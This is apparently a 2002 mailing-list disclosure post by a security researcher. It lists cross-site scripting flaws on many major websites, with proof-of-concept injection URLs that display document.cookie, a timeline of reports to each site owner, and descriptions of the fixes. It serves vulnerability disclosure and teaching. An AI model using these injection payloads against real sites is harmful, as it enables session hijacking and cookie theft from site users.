Cross site scripting in almost every mayor website

[Berend-Jan Wever <skylined () edup tudelft nl>]

On april 26 I posted a message about Cross-Site 
scripting (see bottom) I mentioned that I had 
found Cross-site scripting flaws in many major 
websites but I did not publish the exact details of 
these flaws. After notifying the owners of these 
sites and giving them time to respond and fix the 
problem, I now feel I have to post the details to 
bugtraq. This information and more on cross-site 
scripting can also be found on my website 
http://spoor12.edup.tudelft.nl/skylined which is 
updated almost daily.

Kind regards,
Berend-Jan Wever.

Cross-site scripting archive: Here are all the sites 
that I know to have at least one cross-site 
scripting flaw. I have logged all the 
communication I have had with them. (Last 
update April 19, 2002)

www.search.com  http://www.search.com/search?
q='><SCRIPT>alert(document.cookie)
</SCRIPT>' 
- 23 mar 2002 Reported 
@ "http://www.cnet.com/cnetsupport/contact/1,10
161,0-3945,00.html"
- 28 mar 2002 Reported 
@ "http://www.search.com/feedback/";
 

------------------------------------------------------------------
--------------
 
www.altavista.com  
http://www.altavista.com/sites/search/web?
q=*&kl="><SCRIPT>alert(document.cookie)
</SCRIPT> 
- 23 mar 2002 Reported 
@ "http://help.altavista.com/contact/search";
- 25 mar 2002 Reply by email: "We have 
forwarded your email to our engineering team for 
further investigation"
 

------------------------------------------------------------------
--------------
 
edit.yahoo.com  
http://edit.yahoo.com/config?.done="%
20style="width:expression(document.write
(document.cookie)); 
- 27 mar 2002 Reported to "arturo@yahoo-
inc.com", "mfk () yahoo-inc com"
 

------------------------------------------------------------------
--------------
 
search.netscape.com
addressbook.netscape.com  
http://search.netscape.com/search.psp?
search="><SCRIPT>alert(document.cookie)
</SCRIPT> 
http://addressbook.netscape.com/search.adp?
SearchStr="><SCRIPT>alert(document.cookie)
</SCRIPT> 
(Addressbook.netscape.com requires you to be 
logged in)
- 23 mar 2002 Reported 
@ "http://help.netscape.com/website/feedback.ht
ml"
 

------------------------------------------------------------------
--------------
 
cq-search.ebay.com  http://cq-
search.ebay.com/search/search.dll?
MfcISAPICommand=GetResult&ht="><SCRIPT>a
lert(document.cookie)</SCRIPT>&query=a 
- 26 mar 2002 Reported to "clalonde () ebay com"
- 27 mar 2002 Reply by email: "Reviewing the 
issue", "Do you have any suggestions?"
- 27 mar 2002 Gave some hints and told them 
about my CSS howto.
 

------------------------------------------------------------------
--------------
 
www.amazon.com  
http://www.amazon.com/exec/obidos/ASIN/B0000
5T68P/ref%3D%20style%3Dwidth%
3Aexpression%28document.write%
28document.cookie%29%29%20/ 
- 23 mar 2002 Reported 
@ "http://www.amazon.com/exec/obidos/handle-
generic-form/102-3185800-6674542?action=next-
page&target=stores/help/self-service-email-form-
dispatch.html&display=basic&browse=560710&m
ethod=GET&cgi-post-result=1/102-3185800-
6674542."
- 26 mar 2002 "Cyrus () amazon com" responded 
to my bugtraq post
- 26 mar 2002 Reported to "Cyrus () amazon com"
- 26 mar 2002 Told them about my CSS howto.
 

------------------------------------------------------------------
--------------
 
www.looksmart.com cnn.looksmart.com
 http://www.looksmart.com/r_search?
look=&key=><SCRIPT>alert(document.cookie)
</SCRIPT> 
http://cnn.looksmart.com/r_search?
look=&key=><SCRIPT>alert(document.cookie)
</SCRIPT> 
- 23 mar 2002 Reported 
to "feedback () looksmart net"
 

------------------------------------------------------------------
--------------
 
www.time.com  
http://www.time.com/time/searchresults?
query=a&summaries="%
20style="width:expression(document.write
(document.cookie))" 
- 23 mar 2002 Reported to "daily () timeinc net"
- 26 mar 2002 Reported 
to "Renee_Guttmann () timeinc com"
 

------------------------------------------------------------------
--------------
 
www.infospace.com  
http://www.infospace.com/info.xcite/dog/newsresul
ts.htm?&qkw="><SCRIPT>alert(document.cookie)
</SCRIPT>&qcat=news&fs=nws 
- 23 mar 2002 Reported 
@ "http://www.infospace.com/info/redirs_all.htm?
pgtarg=abtct&"
 

------------------------------------------------------------------
--------------
 
www.lasseters.com.au  
http://www.lasseters.com.au/default3.asp?
Network="%20onload="alert(document.cookie);"%
20z=" 
- 28 mar 2002 Reported 
@ "http://www.lasseters.com.au/help/onetoone.ht
ml" to Karl F (chatid 114640)
- 28 mar 2002 Reported 
to "support () lasseters com au"
- 28 mar 2002 (Automated) reply by email: "our 
priority is to respond to your query as soon as 
possible", tracking number T20020328004M
- 28 mar 2002 Reply by email: "We are 
investigating this issue very seriously", "I have 
passed this information onto the relevant 
department"
 

------------------------------------------------------------------
--------------
 
my.abcnews.go.com  
http://my.abcnews.go.com/localpageMainHandler
?input=<SCRIPT>alert(document.cookie)
</SCRIPT> 
- 28 mar 2002 Reported 
@ "http://abcnews.go.com/service/Help/abccontac
tform.html"
 


Fixed cross-site scripting flaws archive
Here are all the cross-site scripting flaws I 
uncovered which have been fixed now. This is 
just to show how it was done and who have been 
found wanting.
www.redhat.com  
http://www.redhat.com/apps/search/results.html?
ie="><SCRIPT>alert(document.cookie)
</SCRIPT> 
- 26 mar 2002 "mjc () redhat com" responded to 
my bugtraq post.
- 26 mar 2002 Reported to "mjc () redhat com"
- 26 mar 2002 Reply 
from "tlancast () redhat com": "Fixed now"
 

------------------------------------------------------------------
--------------
 
www.hotmail.com  See my MSN Hotmail Cross-
site scripting page for more information
- 19 mar 2002 Reported @ "Report a bug on the 
Hotmail website" (url contained sensitive 
information ;)~
- 22 mar 2002 Reported 
to "support () hotmail com" - bounced
- 23 mar 2002 Reply 
from "abuse () css one microsoft com": "Look at 
the help if you have any problems using hotmail"
- 27 mar 2002 Explained it was a serious issue 
to "abuse () css one microsoft com"
- 27 mar 2002 Reply 
from "abuse () css one microsoft com": "Your e-
mail has been forwarded to the appropriate team"
- 28 mar 2002 Reply 
from "support_x () css one microsoft com": "We 
have tried to reproduce the error, but have been 
unable to do so"
- 29 mar 2002 Send a working example 
to "cs_serv () hotmail com"
- 30 mar 2002 Reply 
from "cs_serv () hotmail com": "We have 
confirmed the issue that you describe and are 
currently working on a fix"
- 30 mar 2002 Reply 
from "cs_serv () hotmail com": "we have isolated 
the bug and expect to have a fix for it out by 
Wednesday." (3 apr 2002)
The fix: as far as I could find out they now replace 
the properties 'dataFld', 'dataFormatAs' 
and 'dataSrc' of any HTML tag 
with 'xdataFld', 'xdataFormatAs' and 'xdataSrc' to 
prevent XML generation of HTML alltogether.
MSN Hotmail has been very polite to thank me for 
bringing this to their attention multiple times.
 

------------------------------------------------------------------
--------------
 
search.microsoft.com  
http://search.microsoft.com/default.asp?qu=";%
0D%0Aalert(document.cookie);%0D%
0Aa="&boolean=ALL 
This one was fixed within hours after discovery 
and without me notifying microsoft, now that's 
service!
 

------------------------------------------------------------------
--------------
 
www.google.com  http://www.google.nl/search?
as_q=a&ie="><SCRIPT>alert(document.cookie)
</SCRIPT> 
- 23 mar 2002 Reported 
to "webmaster () google com"
- 23 mar 2002 (Automated) reply by email: "you'll 
hear from us soon"
The fix: all '<' and '>' characters are replaced 
with '_'.
I have not received a word from Google except 
for the automated responds. (Guess whether I'm 
gonna report the next CSS to them...)
 

------------------------------------------------------------------
--------------
 
www.nic.cc  http://www.nic.cc/cgi-bin/cart?
domain=&lt;SCRIPT&gt;alert(document.cookie)
&lt;/SCRIPT&gt; 
- 23 mar 2002 Reported to "clientcare () enic cc"
The fix: filter out '<' and '>'.
I have not received a word from Nic.cc. (Guess 
whether I'm gonna report the next CSS to them...)
 

------------------------------------------------------------------
--------------
 
support.microsoft.com  
http://support.microsoft.com/default.aspx?scid=&apos;);}
alert(document.cookie);{// 
- 28 mar 2002 Reported 
to "support () microsoft com"
- 28 mar 2002 (Automated) reply by email: "Your 
e-mail <snip> will be handled personally by one 
of our Customer Service Representatives within 
24 hours"
The fix: The ' in the expoit url used to end a string 
but this string is now enclosed by " instead of ', 
the " character is filtered out.
I have not received a word from microsoft support 
except for the automated responds. (Guess 
whether I'm gonna report the next CSS to them...)
 

------------------------------------------------------------------
--------------
 
download.cnet.com  
http://download.cnet.com/downloads/1,10150,0-
10001-103-0-1-7,00.html?qt=&lt;SCRIPT&gt;alert
(document.cookie)&lt;/SCRIPT&gt; 
- 28 mar 2002 Reported 
@ "http://download.cnet.com/downloads/0-10000-
7-1532857.html?tag=subnav"
The fix: The characters <, > and " are replaced 
with &lt;, &gt; and &quot;.  

------------------------------------------------------------------
--------------
 
www.nu  http://www.nu/tour/tour_images.cfm?
ID=EN&site=&lt;SCRIPT&gt;alert(document.cookie)
&lt;/SCRIPT&gt; 
(The error report would suggest a SQL-injection 
vulnerability but I have not done further testing.)
- 23 mar 2002 Reported both CSS & SQL-
injection to "dwd () mail nic nu"
- 19 apr 2002 The bug seems to have been fixed.